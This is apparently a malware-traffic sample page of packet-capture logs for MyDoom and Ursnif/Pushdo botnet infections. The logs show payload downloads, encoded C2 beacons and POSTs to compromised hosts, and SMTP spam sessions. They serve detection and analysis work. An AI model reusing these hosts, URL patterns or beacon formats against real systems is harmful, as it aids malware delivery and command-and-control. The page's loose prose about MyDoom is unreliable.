Content-Length: 14

d1=1000101001&
2019-07-25 13:05:47.646371 IP 83.220.175.185.80 > 10.7.25.101.49185: Flags [.], ack 151, win 64240, length 0
E..(8……>S…
..e.P.!ZB..+…P…….
2019-07-25 13:05:47.662936 IP 10.7.25.101.49186 > 31.44.184.33.80: Flags [S], seq 291674496, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@….3
..e.,.!.”.P.b…….. ……………..
2019-07-25 13:05:47.758694 IP 77.120.115.221.80 > 10.7.25.101.49183: Flags [FP.], seq 187, ack 154, win 64239, length 0
E..(8……~Mxs.
..e.P……….P…….
2019-07-25 13:05:47.758957 IP 10.7.25.101.49183 > 77.120.115.221.80: Flags [.], ack 188, win 64054, length 0
E..(..@….7
..eMxs….P……..P..6.D..
2019-07-25 13:05:47.763295 IP 31.44.184.33.80 > 10.7.25.101.49184: Flags [P.], seq 1:122, ack 201, win 64240, length 121: HTTP: HTTP/1.1 200 OK
E…8……..,.!
..e.P. .#.j[^b.P…….HTTP/1.1 200 OK
Content-Type: application/octet-stream
Date: Thu, 25 Jul 2019 21:05:22 GMT
Content-Length: 210944

2019-07-25 13:05:48.827934 IP 10.7.25.101.49187 > 31.44.184.33.80: Flags [P.], seq 1:368, ack 1, win 64240, length 367: HTTP: GET /visit.js HTTP/1.1
E….r@….5
..e.,.!.#.P….?t.5P….2..GET /visit.js HTTP/1.1
Accept: */*
Cookie: D6CFR6fSx/2pSZ6OGAbt8JcWC6fjnf0iRH/lXdUuFoUeISeBOx4dHDkZGpLFCgSVAKGsc73GvXP0V+JT4J/NSi6vVSuEzjcFPy8q5lYtHAmcacE1cATGok6yawYmMTtyhx2I0swd+ECPu/GZEjnwuxElE6bQjaa4PTvKsU3FWt4=
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0)
Host: 31.44.184.33
Connection: Keep-Alive
Cache-Control: no-cache

MyDoom DDoS $38 Billion Dollar P2P Malware Botnet PCAP Download Traffic Sample

MyDoom Botnet

MyDoom has several kinds of impact, but its main attacks are DDoS.
MyDoom uses a DGA for its P2P communications, but also relies on some command-and-control servers.

MyDoom, the fastest-spreading malware to hit Microsoft Windows-based computers, caused an estimated $38.7 billion in damage. Spyware is a deadly form of malware that extracts a company’s confidential information without the company’s awareness.

2019-07-15 13:00:22.289866 IP 10.7.15.101.51171 > 10.7.15.1.53: 48767+ MX? acm.org. (25)
E..5……..
..e
……5.!X…………..acm.org…..
2019-07-15 13:00:22.340366 IP 10.7.15.1.53 > 10.7.15.101.51171: 48767 1/0/0 MX mail.mailroute.net. 10 (59)
E..W…….G

..e.5…C……………acm.org………………
.mail mailroute.net.
2019-07-15 13:00:22.348650 IP 10.7.15.101.53658 > 10.7.15.1.53: 65013+ A? mail.mailroute.net. (36)
E..@……..
..e
……5.,$_………….mail mailroute.net…..
2019-07-15 13:00:22.382026 IP 10.7.15.1.53 > 10.7.15.101.53658: 65013 2/0/0 A 199.89.1.120, A 199.89.3.120 (68)
E.........= ...
..e.5...L...............mail mailroute.net..................Y.x.............Y.x
2019-07-15 13:00:22.382637 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [S], seq 3423424506, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@.....
..e.Y.x......O....... .................
2019-07-15 13:00:22.501570 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [S.], seq 2591540629, ack 3423424507, win 64240, options [mss 1460], length 0
E..,......O..Y.x
..e.....w....O.…~…….
2019-07-15 13:00:22.501779 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 1, win 64240, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:22.824195 IP 199.89.1.120.25 > 10.7.15.101.49163: Flags [P.], seq 1:66, ack 1, win 64240, length 65: SMTP: 220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled
E..i……Ot.Y.x
..e…..w….O.P…5…220-in-014.lax.mailroute.net ESMTP Postfix – Postscreen enabled

2019-07-15 13:00:22.928682 IP 10.7.15.101.49163 > 199.89.1.120.25: Flags [.], ack 66, win 64175, length 0
E..(..@…..
..e.Y.x……O..w..P….j..
2019-07-15 13:00:24.456432 IP 10.7.15.101.49164 > 157.130.29.226.1042: Flags [S], seq 824150712, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…%;
..e……..1……… ..I…………..
2019-07-15 13:00:24.924489 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
E..C…….}
..e
….L.5./…G………..lists.freedesktop.org…..
2019-07-15 13:00:24.988231 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
E..D…….{
..e
……5.0..Y…………global.libreoffice.org…..
2019-07-15 13:00:25.049108 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:25.112279 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:25.174765 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.237468 IP 10.7.15.101.50685 > 10.7.15.1.53: 56734+ MX? libreoffice.org. (33)
2019-07-15 13:00:25.939540 IP 10.7.15.101.62796 > 10.7.15.1.53: 51271+ MX? lists.freedesktop.org. (39)
2019-07-15 13:00:26.001128 IP 10.7.15.101.53695 > 10.7.15.1.53: 22968+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.062827 IP 10.7.15.101.57533 > 10.7.15.1.53: 46764+ MX? global.libreoffice.org. (40)
2019-07-15 13:00:26.126226 IP 10.7.15.101.61829 > 10.7.15.1.53: 57956+ MX? documentfoundation.org. (40)
2019-07-15 13:00:26.187392 IP 10.7.15.101.53237 > 10.7.15.1.53: 64071+ MX? libreoffice.org. (33)
2019-07-15 13:00:30.460095 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 1:54, ack 1, win 64240, length 53: SMTP: 220 gabe.freedesktop.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:30.460605 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 1:15, ack 54, win 64187, length 14: SMTP: EHLO acm.org

2019-07-15 13:00:30.460715 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 15, win 64240, length 0
2019-07-15 13:00:30.541199 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [S.], seq 678655145, ack 2272612538, win 64240, options [mss 1460], length 0
2019-07-15 13:00:30.541436 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [.], ack 1, win 64240, length 0
2019-07-15 13:00:30.601674 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 54:197, ack 15, win 64240, length 143: SMTP: 250-gabe.freedesktop.org
250-PIPELINING
250-SIZE 10240000
250-VRFY
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:30.602630 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 15:43, ack 197, win 64044, length 28: SMTP: MAIL FROM:fdrake@acm.org

2019-07-15 13:00:30.602753 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 43, win 64240, length 0
2019-07-15 13:00:30.735767 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [P.], seq 197:211, ack 43, win 64240, length 14: SMTP: 250 2.1.0 Ok

2019-07-15 13:00:30.736105 IP 10.7.15.101.49165 > 131.252.210.177.25: Flags [P.], seq 43:88, ack 211, win 64030, length 45: SMTP: RCPT TO:libreoffice@lists.freedesktop.org

2019-07-15 13:00:30.736205 IP 131.252.210.177.25 > 10.7.15.101.49165: Flags [.], ack 88, win 64240, length 0
2019-07-15 13:00:31.087379 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 1:62, ack 1, win 64240, length 61: SMTP: 220 vm194.documentfoundation.org ESMTP Postfix (Debian/GNU)

2019-07-15 13:00:31.087804 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 1:30, ack 62, win 64179, length 29: SMTP: EHLO global.libreoffice.org

2019-07-15 13:00:31.087907 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 30, win 64240, length 0
2019-07-15 13:00:31.270207 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 62:203, ack 30, win 64240, length 141: SMTP: 250-vm194.documentfoundation.org
250-PIPELINING
250-SIZE 41943040
250-ETRN
250-STARTTLS
250-ENHANCEDSTATUSCODES
250-8BITMIME
250 DSN

2019-07-15 13:00:31.271261 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 30:77, ack 203, win 64038, length 47: SMTP: MAIL FROM:postmaster@global.libreoffice.org

2019-07-15 13:00:31.271380 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 77, win 64240, length 0
2019-07-15 13:00:31.481963 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 203:217, ack 77, win 64240, length 14: SMTP: 250 2.1.0 Ok

2019-07-15 13:00:31.482279 IP 10.7.15.101.49166 > 89.238.68.194.25: Flags [P.], seq 77:121, ack 217, win 64024, length 44: SMTP: RCPT TO:marketing@global.libreoffice.org

2019-07-15 13:00:31.482382 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [.], ack 121, win 64240, length 0
2019-07-15 13:00:31.686040 IP 89.238.68.194.25 > 10.7.15.101.49166: Flags [P.], seq 217:291, ack 121, win 64240, length 74: SMTP: 450 4.7.25 Client host rejected: cannot find your hostname, [173.46.3.9]
2019-07-15 13:01:10.499434 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15417, win 64240, length 0
2019-07-15 13:01:10.499471 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15417:15490, ack 277, win 63964, length 73: SMTP: CsT9qUFJrxQMiBqS5+ujrJr2AxIIs09LsG+iA3CPkMqtdS2sgcamxnnGrtA4ivDGLtbED1P

2019-07-15 13:01:10.499509 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15490, win 64240, length 0
2019-07-15 13:01:10.499581 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15490:15568, ack 277, win 63964, length 78: SMTP: E7QcAFvXa9SwaF1MA+25XC6Xb+5j72HwbPEgNsvlcvJT82X0dPX2abBcLrdR9274Z/lz+rkty1Y9

2019-07-15 13:01:10.499614 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15568, win 64240, length 0
2019-07-15 13:01:10.499657 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15568:15646, ack 277, win 63964, length 78: SMTP: VGVtRtNw2zXLZtTVctbXB9h5Stc122bZ2kk629xG3S9X13Vd3hvfD+AL4RPixF3TNE3j5OXm52Lo

2019-07-15 13:01:10.499691 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15646, win 64240, length 0
2019-07-15 13:01:10.499734 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15646:15724, ack 277, win 63964, length 78: SMTP: ayRiB6m+hApMrsThtQk5GBJlW44m81qQKIQEp2QE4j0jTGYk/2GSAblMTNfzYTeCklCW7FAxj2Rb

2019-07-15 13:01:10.499767 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15724, win 64240, length 0
2019-07-15 13:01:10.499810 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15724:15803, ack 277, win 63964, length 79: SMTP: 2NcgGtBqBSLnY giJR0CBABxailQGXkwC0KBXZVbPzoFEy/y8ip3S5Nl4Dcv9kIc7Nsh3/GkPxg5D

2019-07-15 13:01:10.499843 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15803, win 64240, length 0
2019-07-15 13:01:10.499885 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15803:15852, ack 277, win 63964, length 49: SMTP: Wd5SdLNn/C0eKzCNUzbpLcJolBHSO1nx/hqx/g+lBVp+vKY

2019-07-15 13:01:10.499919 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15852, win 64240, length 0
2019-07-15 13:01:10.499962 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15852:15874, ack 277, win 63964, length 22: SMTP: WwwouqTVQl4axZk+9NR8

2019-07-15 13:01:10.499995 IP 185.70.40.103.25 > 10.7.15.101.49211: Flags [.], ack 15874, win 64240, length 0
2019-07-15 13:01:10.500037 IP 10.7.15.101.49211 > 185.70.40.103.25: Flags [P.], seq 15874:15886, ack 277, win 63964, length 12: SMTP: fFly N+umw

Ursnif and Pushdo Trojan DDoS Botnet Malware Infection PCAP file download traffic sample

2019-07-29 12:48:13.981152 IP 10.7.29.101.49158 > 185.244.213.113.443: Flags [P.], seq 1:118, ack 1, win 64240, length 117
2019-07-29 12:48:13.981273 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [.], ack 118, win 64240, length 0
2019-07-29 12:48:14.192305 IP 185.244.213.113.443 > 10.7.29.101.49158: Flags [P.], seq 1:1383, ack 118, win 64240, length 1382

2019-07-29 12:52:10.719361 IP 10.7.29.101.49161 > 40.76.4.15.80: Flags [P.], seq 1:458, ack 1, win 64240, length 457: HTTP: GET /images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko/20100101 Firefox/12.0
Accept-Encoding: gzip, deflate
Host: microsoft.com
DNT: 1
Connection: Keep-Alive

2019-07-29 12:52:10.719447 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [.], ack 458, win 64240, length 0
2019-07-29 12:52:10.807321 IP 40.76.4.15.80 > 10.7.29.101.49161: Flags [P.], seq 1:325, ack 458, win 64240, length 324: HTTP: HTTP/1.1 301 Moved Permanently
Date: Mon, 29 Jul 2019 16:52:10 GMT
Server: Kestrel
Content-Length: 0
Location: https://www.microsoft.com/images/zIbeJIvqUUkX/kB7HNwBuSwR/ygaZ_2FJcEM1Uu/ZIwIpN519Vcad9tkWkAGe/fZrzfJsmSKQLtF2J/827S1NiugG_2B1e/NbD1r9FXrSGs_2FU20/_2FkMZhz8/4N6SI9UeCx3MN4wr4bOt/SJ6LOD6Rida5wk8ujR6/K3h.avi

2019-07-29 12:53:39.848186 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1:438, ack 1, win 64240, length 437: HTTP: GET /images/n4zofhavQgNnJWOdBQ0/nPKAARUazfT3JA1eP9tpCw/HdIhYDqCQpUHz/_2BSSI3R/phBSl6Ce_2Bs0W_2BD7POgC/GmZq5N6N1r/keTipeJU9vv_2BLiU/pOuusTuOjboG/UB_2BmP7hsa/w71kdYG5ZOIMUr/gCbHKq37/FZ3.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:39.848277 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 438, win 64240, length 0
2019-07-29 12:53:40.046606 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [P.], seq 1:1383, ack 438, win 64240, length 1382: HTTP: HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:14 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=i52pvsrt089bi7i3umb88bd400; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:14 GMT; path=/; domain=.irwhfgowe.xyz
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

355bc
2019-07-29 12:53:40.046704 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [.], ack 1383, win 62858, length 0
2019-07-29 12:53:40.048505 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 1383:2843, ack 438, win 64240, length 1460: HTTP
2019-07-29 12:53:40.048521 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 2843:4303, ack 438, win 64240, length 1460: HTTP

2019-07-29 12:53:43.474193 IP 10.7.29.101.49234 > 46.21.147.29.80: Flags [P.], seq 1076:1511, ack 500659, win 64240, length 435: HTTP: GET /images/_2B4OwFC/6vjfFP_2B9uEz70SydULkkQ/V6jakRAWYD/AOLjnZYCVGOTKqeQQ/jEaRE2qFGZsu/lTmxprbzXB2/42A_2FkdM3tNun/gLYbeGst8_2BWnKGu7mGT/ZW8gMjxsJDmd0ZZG/9PzwD2p8rTJNi6b/XP71k6bvIt/7.avi HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: 46.21.147.29
DNT: 1
Connection: Keep-Alive

2019-07-29 12:53:43.474326 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], ack 1511, win 64240, length 0
2019-07-29 12:53:43.681682 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 500659:502119, ack 1511, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
Date: Tue, 30 Jul 2019 01:16:17 GMT
Server: Apache/2.4.6 (CentOS) PHP/5.4.16
X-Powered-By: PHP/5.4.16
Set-Cookie: PHPSESSID=nthmmr62j6fsaf2hggojf13s20; path=/; domain=.irwhfgowe.xyz
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: lang=en; expires=Thu, 29-Aug-2019 01:16:17 GMT; path=/; domain=.irwhfgowe.xyz
Content-Length: 2480
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

2019-07-29 12:53:43.681709 IP 46.21.147.29.80 > 10.7.29.101.49234: Flags [.], seq 502119:503579, ack 1511, win 64240, length 1460: HTTP

2019-07-29 13:00:51.068034 IP 10.7.29.101.49247 > 109.123.223.76.80: Flags [P.], seq 1:179, ack 1, win 64240, length 178: HTTP: GET /demo/PhotoA.rar HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64)
Host: kacafirek.cz
Connection: Keep-Alive
Cache-Control: no-cache

2019-07-29 13:00:51.068133 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], ack 179, win 64240, length 0
2019-07-29 13:00:51.258107 IP 109.123.223.76.80 > 10.7.29.101.49247: Flags [.], seq 1:1461, ack 179, win 64240, length 1460: HTTP: HTTP/1.1 200 OK
Date: Mon, 29 Jul 2019 17:00:51 GMT
Server: Apache
Last-Modified: Mon, 29 Jul 2019 08:06:23 GMT
ETag: "e60124-3eea3-58ecd5e2cfdc0"
Accept-Ranges: bytes
Content-Length: 257699
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-rar-compressed

2019-07-29 13:00:58.982371 IP 10.7.29.101.53764 > 172.16.5.2.53: 23168+ A? www.vitaindu.com. (34)
2019-07-29 13:00:58.982627 IP 10.7.29.101.63732 > 172.16.5.2.53: 20475+ A? www.pr-park.com. (33)
2019-07-29 13:00:58.982894 IP 10.7.29.101.65154 > 172.16.5.2.53: 28480+ A? www.2print.com. (32)
2019-07-29 13:00:58.984127 IP 10.7.29.101.54427 > 172.16.5.2.53: 60399+ A? www.crcsi.org. (31)
2019-07-29 13:00:58.987089 IP 10.7.29.101.49386 > 172.16.5.2.53: 17994+ A? www.spanesi.com. (33)
2019-07-29 13:00:58.987781 IP 10.7.29.101.58486 > 172.16.5.2.53: 43542+ A? www.owsports.ca. (33)
2019-07-29 13:00:58.989882 IP 10.7.29.101.54356 > 172.16.5.2.53: 39383+ A? www.rs-ag.com. (31)
2019-07-29 13:00:58.991007 IP 10.7.29.101.60036 > 172.16.5.2.53: 34096+ A? www.c9dd.com. (30)
2019-07-29 13:00:58.992556 IP 10.7.29.101.53486 > 172.16.5.2.53: 64159+ A? www.udesign.biz. (33)
2019-07-29 13:00:58.993571 IP 10.7.29.101.57888 > 172.16.5.2.53: 32553+ A? wpad.localdomain. (34)
2019-07-29 13:00:59.054760 IP 172.16.5.2.53 > 10.7.29.101.58486: 43542 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
2019-07-29 13:00:59.058581 IP 10.7.29.101.49248 > 198.105.254.64.80: Flags [S], seq 1756324796, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.059556 IP 172.16.5.2.53 > 10.7.29.101.53486: 64159 2/0/0 A 198.105.254.64, A 198.105.244.64 (65)
2019-07-29 13:00:59.060024 IP 10.7.29.101.49249 > 198.105.254.64.80: Flags [S], seq 331088107, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.070348 IP 172.16.5.2.53 > 10.7.29.101.49386: 17994 2/2/4 A 104.26.2.86, A 104.26.3.86 (204)
2019-07-29 13:00:59.070711 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [S], seq 4069494565, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.083033 IP 172.16.5.2.53 > 10.7.29.101.54356: 39383 2/2/4 A 104.31.73.201, A 104.31.72.201 (203)
2019-07-29 13:00:59.083341 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [S], seq 4209286921, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.092781 IP 172.16.5.2.53 > 10.7.29.101.60036: 34096 2/2/4 A 104.25.152.27, A 104.25.153.27 (202)
2019-07-29 13:00:59.093130 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [S], seq 2628897602, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.124030 IP 172.16.5.2.53 > 10.7.29.101.54427: 60399 2/2/4 CNAME crcsi.org., A 198.12.145.135 (204)
2019-07-29 13:00:59.124420 IP 10.7.29.101.49253 > 198.12.145.135.80: Flags [S], seq 3693053252, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.134787 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [S.], seq 1144726242, ack 4069494566, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.134962 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.135089 IP 10.7.29.101.49250 > 104.26.2.86.80: Flags [P.], seq 1:771, ack 1, win 64240, length 770: HTTP: POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.spanesi.com
Cache-Control: no-cache

Ax7m7VKupQADayozBXlPTlW3Rb+iyGxupqnfz1KXuEtJqsumvHWGTXgJ3la7IYWyy0wrfcd5tq0Nv67QGRfa37je7asRoaeUZBk3+iNqzlDQfA5IlmanUWhBkpt6ZvKUdmZZ09qLi6STnTf1e8iYiZFDHV044pCuy5LeLxK83OAITgApwVagHdhrfPJ0aVaMwjbgjaLz/50Y1fI2IXTVCi3T1cJt3/qeUYHullfNxq/RhDqhf0+7FujpJC/mzBY9wTmslIDYVlPBBkxidBjvOXZbqxwXVr+tpsacYBRwCAUzqodwinxWAE+dL0w39CJzQkeDpIsP7Ie+uXE82zpN4CVrDcdENT1FKfEoSEgyIhif8lf4AEWirBJ8H7KfdQFT+rWN11eEqNzZcI0neS/w6AhPyUsXP8M7DI2Zhm3/1gkVs6MteuCbYZ6nXSHMa1T1txVasJ8QIuIXOBeHEj+6bmVcFiZbiFuVztE6eZJsE6lehw52lhdoJ5y+6s0lkNiWzYvmi/zEedIjhAJc02zaoQ==
2019-07-29 13:00:59.135140 IP 104.26.2.86.80 > 10.7.29.101.49250: Flags [.], ack 771, win 64240, length 0
2019-07-29 13:00:59.153346 IP 172.16.5.2.53 > 10.7.29.101.65154: 28480 2/2/4 CNAME 2print.com., A 184.168.221.53 (202)
2019-07-29 13:00:59.153873 IP 10.7.29.101.49254 > 184.168.221.53.80: Flags [S], seq 1193526277, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.155302 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [S.], seq 355223488, ack 4209286922, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.155392 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.155532 IP 10.7.29.101.49251 > 104.31.73.201.80: Flags [P.], seq 1:773, ack 1, win 64240, length 772: HTTP: POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 540
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.rs-ag.com
Cache-Control: no-cache

2019-07-29 13:00:59.155592 IP 104.31.73.201.80 > 10.7.29.101.49251: Flags [.], ack 773, win 64240, length 0
2019-07-29 13:00:59.171901 IP 104.25.152.27.80 > 10.7.29.101.49252: Flags [S.], seq 924723558, ack 2628897603, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.172132 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.172470 IP 10.7.29.101.49252 > 104.25.152.27.80: Flags [P.], seq 1:768, ack 1, win 64240, length 767: HTTP: POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 536
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.c9dd.com
Cache-Control: no-cache


2019-07-29 13:00:59.687314 IP 10.7.29.101.52012 > 172.16.5.2.53: 33479+ A? www.vazir.se. (30)
2019-07-29 13:00:59.699312 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [S.], seq 687621463, ack 3876635042, win 64240, options [mss 1460], length 0
2019-07-29 13:00:59.699454 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [.], ack 1, win 64240, length 0
2019-07-29 13:00:59.699544 IP 10.7.29.101.49259 > 58.64.191.148.80: Flags [P.], seq 1:756, ack 1, win 64240, length 755: HTTP: POST / HTTP/1.1
Accept: */*
Accept-Language: en-us
Content-Type: application/octet-stream
Content-Length: 520
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
Host: www.vitaindu.com
Cache-Control: no-cache

2019-07-29 13:00:59.699603 IP 58.64.191.148.80 > 10.7.29.101.49259: Flags [.], ack 756, win 64240, length 0
2019-07-29 13:00:59.782318 IP 172.16.5.2.53 > 10.7.29.101.58389: 12756 1/2/2 A 210.140.73.39 (142)
2019-07-29 13:00:59.783153 IP 10.7.29.101.49262 > 210.140.73.39.80: Flags [S], seq 3843601751, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
2019-07-29 13:00:59.819475 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 13821:15203, ack 811, win 64240, length 1382: HTTP
2019-07-29 13:00:59.819587 IP 10.7.29.101.49255 > 157.7.107.91.80: Flags [.], ack 15203, win 62858, length 0
2019-07-29 13:00:59.820412 IP 157.7.107.91.80 > 10.7.29.101.49255: Flags [P.], seq 15203:16585, ack 811, win 64240, length 1382: HTTP